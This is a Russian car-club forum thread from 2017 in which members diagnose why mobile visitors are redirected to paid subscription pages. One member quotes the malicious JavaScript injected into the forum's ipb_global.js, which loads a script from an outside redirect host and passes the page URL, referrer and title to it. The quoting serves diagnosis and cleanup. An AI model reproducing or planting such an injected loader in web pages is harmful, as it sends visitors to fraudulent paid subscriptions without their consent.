Помощь - Поиск - Пользователи - Календарь
Полная версия этой страницы: Перенаправление На Другой Сайт
Форум клуба Subaru Legacy и Outback > Работа форума > Отзывы и предложения
cortin
Добрый день. Почему при входе на сайт с телефона меня постоянно перекидывает на какую то хрень и предлогает на какую то подписку платную. Оператор теле2. При чем ладно бы со своего телефона. Так с другого тоже самое, но при этом оператор теле2.
bond1211
с мтс тож самое
Yuriy Spb
Точно, пользоваться со смартфона стало невозможно...
cortin
Вот щас стало нормально вроде.
cortin
Рано радовался. Это я дома через вайфай заходил с телефона.
Mechanic
Оперативненько...(((( 15 мая написал о проблеме в теме "атаки на форум" , на дворе июнь... Чо? Можно поздравить? Решили? А то какой-то игнор на 2 недели и тишина... Скорость решения явно не субаровская...
Eau Rouge
Цитата(Mechanic @ 1.6.2017, 1:58) *
Оперативненько...(((( 15 мая написал о проблеме в теме "атаки на форум" , на дворе июнь... Чо? Можно поздравить? Решили? А то какой-то игнор на 2 недели и тишина... Скорость решения явно не субаровская...

с форумом никто ничего не делал-))))
Mechanic
Цитата(Eau Rouge @ 1.6.2017, 17:27) *
с форумом никто ничего не делал-))))

Ну значит у меня планшет в моё отсутствие сходил волшебных витаминок выпил и поправился...???))) или форум прихворал и никому не сказал...????)))
bond1211
Да всё так же продолжается, вчера пытался с телефона зайти, перенаправляет с полной версии форума, с печатной всё ок.
cherub
Цитата(Eau Rouge @ 1.6.2017, 19:27) *
с форумом никто ничего не делал-))))

С форумом может никто ничего и не делал, а вот с javascript-том кто-то похоже что-то сделал.

Вот в этом js-ке http://www.subarulegacy.ru/forum/jscripts/ipb_global.js
Прописана ссылка s.src='https://fucktds.ru/C9DYPD?frm=script&' <дальше много буков>

На этот fucktds и перебрасывает когда заходишь с мобильника через мобильную сеть, и он уже перебрасывает куда-то дальше.

Я в JS не силен, но так понимаю этот скрипт формирует ссылку по которой скачивается уже вредный скрипт.

Опять же кто-то же когда-то вписал на главной странице ссылку на это скрипт. Я в html страницы вижу вот это:
<script type="text/javascript" src='forum/jscripts/ipb_global.js'></script>
</head>
cherub
Вот я так понимаю вредная часть из ipb_global.js

var d=document;var s=d.createElement('script');
s.src='https://fucktds.ru/C9DYPD?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

она берет текущую страницу и добавляет ей в head ссылку на вредный скрипт.

сам ipb_global.js похоже полезный зверь

Но изначально он видимо выглядел как-то вот так :
https://forum.netall.ru/jscripts/ipb_global.js

Собсвенно логика там начинается с
var input_red = 'input-warn';

Как раз прям перед этим в нашем скрипте вписана гадость.
Mechanic
Цитата(Eau Rouge @ 1.6.2017, 17:27) *
с форумом никто ничего не делал-))))

Шайтанама)))))
Mechanic
Цитата(cherub @ 2.6.2017, 10:46) *
Вот я так понимаю вредная часть из ipb_global.js
...

Собсвенно логика там начинается с
var input_red = 'input-warn';

Как раз прям перед этим в нашем скрипте вписана гадость.

Спасибо добрый человек, а то я тут ору в пустыне)))
GSX-R
Подтверждаю ...В конце мая заметил такую хрень.Переходил по закладке в телефоне.Вчера друг заходил через телефон- тоже выкидывает на какую-то хрень платную.
Yuriy Spb
Модераторы, админы, а-у-у-у-у!!! Джава-скрипты почистите, плиз, не хочу посылаться к платным проституткам ))
obk
Практически ежедневно захожу с планшета на андроиде, никуда не перекидывает, как работало так и работает
Инет на планшете домашний через вифи

Данный пост также с планшета написан
cherub
Цитата(obk @ 4.6.2017, 23:45) *
Практически ежедневно захожу с планшета на андроиде, никуда не перекидывает, как работало так и работает
Инет на планшете домашний через вифи

Данный пост также с планшета написан

Дык в том-то и дело что по wifi все нормально. А вот если по 3G, то лезет гадость.
Сайт куда перебрасывает вражеский скрипт (ну или сам скрипт, хотя врядли) он умный, и гадость подсовывает тем кто на мобильном интернете.

Прикол, как я думаю заключен в политике сотовых операторов, типа если у тебя инет с телефона, то ты считаешься авторизованным,
и типа если ты где-то на страничке куда-то ткнешь, то ОПЕРАТОР тебя на ура подпишет на какую нибудь услугу по 20 р в сутки.
(За всех операторов не буду врать, но жена встревала так с Билайном)

Вот этим, этот вражеский скрипт похоже и пытается воспользоваться, типа подсунуть рекламку чтобы человек жамкнул.
Но смысл в жамке, есть только когда включен "мобильный интернет".
Если по wifi, а тем более на десктопе, то только палево для скрипта.
Eau Rouge
Цитата(cherub @ 5.6.2017, 6:12) *
Дык в том-то и дело что по wifi все нормально. А вот если по 3G, то лезет гадость.
Сайт куда перебрасывает вражеский скрипт (ну или сам скрипт, хотя врядли) он умный, и гадость подсовывает тем кто на мобильном интернете.

Прикол, как я думаю заключен в политике сотовых операторов, типа если у тебя инет с телефона, то ты считаешься авторизованным,
и типа если ты где-то на страничке куда-то ткнешь, то ОПЕРАТОР тебя на ура подпишет на какую нибудь услугу по 20 р в сутки.
(За всех операторов не буду врать, но жена встревала так с Билайном)

Вот этим, этот вражеский скрипт похоже и пытается воспользоваться, типа подсунуть рекламку чтобы человек жамкнул.
Но смысл в жамке, есть только когда включен "мобильный интернет".
Если по wifi, а тем более на десктопе, то только палево для скрипта.

Прикол не в этом.. там просматривается пул ипов сотовых операторов. Тех, кто на теле2, редиректит на подписки теле2, кто на мтс, на подписки мтс.. Собственно, именно поэтому это и работает только для сотовых данных, ибо через вафлю или с компов пулы другие, поэтому, скорее всего, редирект и не работает.

З.Ы. Ща поправят все..
З.З.Ы. cherub - отдельное спасибо.
cherub
Цитата(Eau Rouge @ 5.6.2017, 18:59) *
Прикол не в этом.. там просматривается пул ипов сотовых операторов. Тех, кто на теле2, редиректит на подписки теле2, кто на мтс, на подписки мтс.. Собственно, именно поэтому это и работает только для сотовых данных, ибо через вафлю или с компов пулы другие, поэтому, скорее всего, редирект и не работает.

З.Ы. Ща поправят все..
З.З.Ы. cherub - отдельное спасибо.
Ну смысл я похоже таки правильно угадал smile.gif чтоб людей подписать за бабки на что-то.
Да, пожалуйста smile.gif
muxa1
Такое вот уже в яндексе при поиске с мобилы.

Нажмите для просмотра прикрепленного файла

с мобилы вообще никак не попасть на сайт через мобильный интернет, это так и должно быть или вирусня на сайте ?

beeline

сама переадресация на подписку
Нажмите для просмотра прикрепленного файла

Vortex23
Цитата(muxa1 @ 11.7.2017, 22:46) *
Такое вот уже в яндексе при поиске с мобилы.

Нажмите для просмотра прикрепленного файла

с мобилы вообще никак не попасть на сайт через мобильный интернет, это так и должно быть или вирусня на сайте ?

beeline

сама переадресация на подписку
Нажмите для просмотра прикрепленного файла



я думал, что у меня одного такое
Tele2
Отзыв о Tele2 3G - постоянные разрывы связи, скорость в режиме 3G ниже, чем EDGE. Исходящие пакеты часто не проходят рутер сети провайдера или задерживаются на несколько секунд. Кроме этого, провайдер передаёт номер телефона пользователя на некоторые серверы с целью введя посетителя в заблуждение подписать на услугу платного контента. При этом согласия абонента Tele2 не спрашивает.

Инструкция для внутренного пользования сотрудниками техподдержки Теле2
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.
Форум IP.Board © 2001-2020 IPS, Inc.